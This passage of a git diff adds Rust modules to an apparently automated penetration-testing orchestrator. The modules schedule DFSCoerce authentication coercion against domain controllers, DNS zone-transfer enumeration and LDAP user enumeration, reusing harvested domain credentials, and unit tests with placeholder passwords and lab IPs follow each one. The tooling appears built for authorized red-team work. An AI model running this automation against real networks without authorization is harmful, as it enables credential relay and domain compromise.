+ + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("dfs_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_dfs_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "dfs_coercion", + "target_ip": item.dc_ip, + "domain": item.domain, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("dfs_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "DFSCoerce (MS-DFSNM) coercion dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DFS_COERCION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DFS_COERCION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "DFSCoerce task deferred"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch DFSCoerce"); + } + } + } + } +} + +struct DfsWork { + dedup_key: String, + domain: String, + dc_ip: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::Credential; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("dfs_coerce:{}", "192.168.58.10"); + assert_eq!(key, "dfs_coerce:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DFS_COERCION, "dfs_coercion"); + } + + #[test] + fn skips_self_listener() { + let dc_ip = "192.168.58.50"; + let listener = "192.168.58.50"; + assert_eq!(dc_ip, listener, "DC IP matching listener should be skipped"); + + let dc_ip2 = "192.168.58.10"; + assert_ne!(dc_ip2, listener, "Different IP should not be skipped"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "dfs_coercion", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "dfs_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = DfsWork { + dedup_key: "dfs_coerce:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "dfs_coerce:192.168.58.10"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn self_targeting_prevention() { + let listener = "192.168.58.50"; + let dc_ips = ["192.168.58.10", "192.168.58.50", "192.168.58.20"]; + + let non_self: Vec<&&str> = dc_ips.iter().filter(|ip| **ip != listener).collect(); + + assert_eq!(non_self.len(), 2); + assert!(!non_self.contains(&&"192.168.58.50")); + assert!(non_self.contains(&&"192.168.58.10")); + assert!(non_self.contains(&&"192.168.58.20")); + } + + #[test] + fn domain_extraction_for_credential_match() { + let domain = "contoso.local"; + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!( + cred_domain.to_lowercase(), + domain.to_lowercase(), + "Domain matching should be case-insensitive" + ); + + let domain2 = "fabrikam.local"; + assert_ne!( + cred_domain.to_lowercase(), + domain2.to_lowercase(), + "Different domains should not match" + ); + } + + // --- collect_dfs_coercion_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_dcs_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "dfs_coerce:192.168.58.10"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_dc_matching_listener() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.50".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/dns_enum.rs b/ares-cli/src/orchestrator/automation/dns_enum.rs new file mode 100644 index 00000000..8d3e5bc7 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dns_enum.rs @@ -0,0 +1,398 @@ +//! auto_dns_enum -- DNS zone transfer and record enumeration. +//! +//! Attempts AXFR zone transfers and enumerates DNS records (SRV, A, CNAME) +//! from each discovered DC. DNS records reveal additional hosts, services, +//! and naming conventions that port scanning alone may miss. +//! +//! Zone transfers are often allowed from domain-joined machines, and even +//! when blocked, DNS SRV record enumeration reveals AD-registered services +//! (e.g., _msdcs, _kerberos, _ldap, _gc, _http). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect DNS enumeration work items from current state. +/// +/// Pure logic extracted from `auto_dns_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_dns_enum_work(state: &StateInner) -> Vec { + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("dns_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_DNS_ENUM, &dedup_key) { + continue; + } + + // DNS enum can work without creds (zone transfer, SRV queries) + // but we pass creds if available for authenticated queries + let cred = state + .credentials + .iter() + .find(|c| !c.password.is_empty() && c.domain.to_lowercase() == domain.to_lowercase()) + .cloned(); + + items.push(DnsEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// DNS enumeration per domain. +/// Interval: 45s. +pub async fn auto_dns_enum(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("dns_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_dns_enum_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "dns_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + }); + + if let Some(ref cred) = item.credential { + payload["credential"] = json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + } + + let priority = dispatcher.effective_priority("dns_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "DNS enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DNS_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DNS_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "DNS enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch DNS enumeration"); + } + } + } + } +} + +struct DnsEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("dns_enum:{}", "contoso.local"); + assert_eq!(key, "dns_enum:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("dns_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "dns_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DNS_ENUM, "dns_enum"); + } + + #[test] + fn no_cred_required() { + // DNS enum works without credentials for zone transfer / SRV queries + let cred: Option = None; + assert!(cred.is_none()); + } + + #[test] + fn payload_without_cred() { + let payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + assert!(payload.get("credential").is_none()); + } + + #[test] + fn payload_structure_has_correct_technique() { + let payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + assert_eq!(payload["technique"], "dns_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn payload_with_credential() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let mut payload = serde_json::json!({ + "technique": "dns_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + }); + payload["credential"] = serde_json::json!({ + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let work = DnsEnumWork { + dedup_key: "dns_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: None, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert!(work.credential.is_none()); + } + + #[test] + fn work_struct_with_credential() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = DnsEnumWork { + dedup_key: "dns_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: Some(cred), + }; + assert!(work.credential.is_some()); + assert_eq!(work.credential.unwrap().username, "admin"); + } + + #[test] + fn dedup_key_domain_based() { + let domain1 = "contoso.local"; + let domain2 = "fabrikam.local"; + let key1 = format!("dns_enum:{}", domain1.to_lowercase()); + let key2 = format!("dns_enum:{}", domain2.to_lowercase()); + assert_ne!(key1, key2); + assert_eq!(key1, "dns_enum:contoso.local"); + assert_eq!(key2, "dns_enum:fabrikam.local"); + } + + #[test] + fn case_normalization_mixed() { + let key = format!("dns_enum:{}", "Contoso.Local".to_lowercase()); + assert_eq!(key, "dns_enum:contoso.local"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_dns_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_no_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].credential.is_some()); + assert_eq!(work[0].credential.as_ref().unwrap().username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_DNS_ENUM, "dns_enum:contoso.local".into()); + let work = collect_dns_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_skips_empty_password_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + // Empty password cred should not be selected + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_cred_only_matches_same_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + // Cross-domain cred should NOT be selected (dns_enum only matches same domain) + assert!(work[0].credential.is_none()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "dns_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_dns_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert!(work[0].credential.is_some()); + } +} diff --git a/ares-cli/src/orchestrator/automation/domain_user_enum.rs b/ares-cli/src/orchestrator/automation/domain_user_enum.rs new file mode 100644 index 00000000..2dda9eb9 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/domain_user_enum.rs @@ -0,0 +1,436 @@ +//! auto_domain_user_enum -- explicit per-domain LDAP user enumeration. +//! +//! Unlike initial recon (which does broad DC scanning), this module dispatches +//! targeted LDAP user enumeration per domain using the best available credential. +//! This fills the gap where a trusted domain's users are not enumerated because +//! the initial recon agent only has primary-domain credentials. +//! +//! Dispatches `ldap_user_enumeration` to the recon role for each domain that +//! has a DC but hasn't been fully enumerated yet. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect user enumeration work items from current state. +/// +/// Pure logic extracted from `auto_domain_user_enum` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_user_enum_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("user_enum:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_DOMAIN_USER_ENUM, &dedup_key) { + continue; + } + + // Prefer a credential from the target domain. + // Fall back to any available credential (cross-domain LDAP may work). + let cred = match state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + state.credentials.iter().find(|c| { + !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(UserEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + }); + } + + items +} + +/// Dispatches per-domain LDAP user enumeration. +/// Interval: 45s. +pub async fn auto_domain_user_enum( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("domain_user_enumeration") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_user_enum_work(&state) + }; + + for item in work { + let cross_domain = item.credential.domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"], + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + + let priority = dispatcher.effective_priority("domain_user_enumeration"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + cred_user = %item.credential.username, + "Domain user enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DOMAIN_USER_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DOMAIN_USER_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Domain user enumeration deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch user enumeration"); + } + } + } + } +} + +struct UserEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("user_enum:{}", "contoso.local"); + assert_eq!(key, "user_enum:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DOMAIN_USER_ENUM, "domain_user_enum"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"], + }); + assert_eq!(payload["technique"], "ldap_user_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn ldap_filter_format() { + let filters = ["(objectCategory=person)(objectClass=user)"]; + assert_eq!(filters.len(), 1); + assert!(filters[0].contains("objectCategory=person")); + assert!(filters[0].contains("objectClass=user")); + } + + #[test] + fn ldap_attributes_list() { + let attrs = [ + "sAMAccountName", + "description", + "memberOf", + "userAccountControl", + "servicePrincipalName", + ]; + assert_eq!(attrs.len(), 5); + assert!(attrs.contains(&"sAMAccountName")); + assert!(attrs.contains(&"servicePrincipalName")); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = UserEnumWork { + dedup_key: "user_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("user_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "user_enum:contoso.local"); + } + + #[test] + fn credential_quarantine_check_logic() { + // Empty password should be skipped by the credential selection logic + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "".into(), + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + assert!(cred.password.is_empty()); + } + + #[test] + fn cross_domain_credential_fallback() { + // When no same-domain cred exists, any cred can be used (cross-domain LDAP) + let creds = [ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }]; + let target_domain = "contoso.local"; + let same_domain = creds.iter().find(|c| { + c.domain.to_lowercase() == target_domain.to_lowercase() && !c.password.is_empty() + }); + assert!(same_domain.is_none()); + let fallback = creds.iter().find(|c| !c.password.is_empty()); + assert!(fallback.is_some()); + assert_eq!(fallback.unwrap().domain, "fabrikam.local"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DOMAIN_USER_ENUM, "user_enum:contoso.local".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred available, should fall back + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_falls_back() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "user_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + 